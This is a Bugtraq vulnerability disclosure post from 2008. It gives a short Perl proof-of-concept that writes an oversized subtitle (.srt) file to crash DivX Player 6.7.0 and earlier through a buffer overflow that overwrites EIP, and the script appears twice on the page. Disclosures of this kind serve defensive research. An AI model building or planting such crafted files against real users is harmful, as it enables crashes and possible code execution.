Threat level definition
Search:
Home
Bugtraq
Vulnerabilities
Mailing Lists
Jobs
Tools
Vista
News
Infocus
Foundations
Microsoft
Unix
IDS
Incidents
Virus
Pen-Test
Firewalls
Focus On: Vista
Columnists
Mailing Lists
Newsletters
Bugtraq
Focus on IDS
Focus on Linux
Focus on Microsoft
Forensics
Pen-test
Security Basics
Vuln Dev
Vulnerabilities
Jobs
Job Opportunities
Resumes
Job Seekers
Employers
Tools
RSS
News
Vulns
Back to list
|
Post reply
DIVX Player <= 6.7.0 Buffer Overflow PoC ( .SRT )
Apr 15 2008 07:58PM
securfrog gmail com
# DIVX Player <= 6.7.0 Buffer Overflow PoC ( .SRT )
# Bug: When parsing a subtitle file with an overly long subtitle DIVX player will deadly crash with eip overwritted
# Replace MOVIE_FILENAME by your movie filename ( .avi )
#
#!/usr/local/bin/perl
my $file="MOVIE_FILENAME.srt";
my $payload = "A" x 4096;
open( $file, ">>$file") or die "Cannot open $file: $!";
print $file "1 \n";
print $file "00:00:01,001 --> 00:00:02,001\n";
print $file $payload;
close($file);
print "$file has been created \n";
[ reply ]
Privacy Statement
Copyright 2007, SecurityFocus
# Bug: When parsing a subtitle file with an overly long subtitle DIVX player will deadly crash with eip overwritted
# Replace MOVIE_FILENAME by your movie filename ( .avi )
#
#!/usr/local/bin/perl
my $file="MOVIE_FILENAME.srt";
my $payload = "A" x 4096;
open( $file, ">>$file") or die "Cannot open $file: $!";
print $file "1 \n";
print $file "00:00:01,001 --> 00:00:02,001\n";
print $file $payload;
close($file);
print "$file has been created \n";
[ reply ]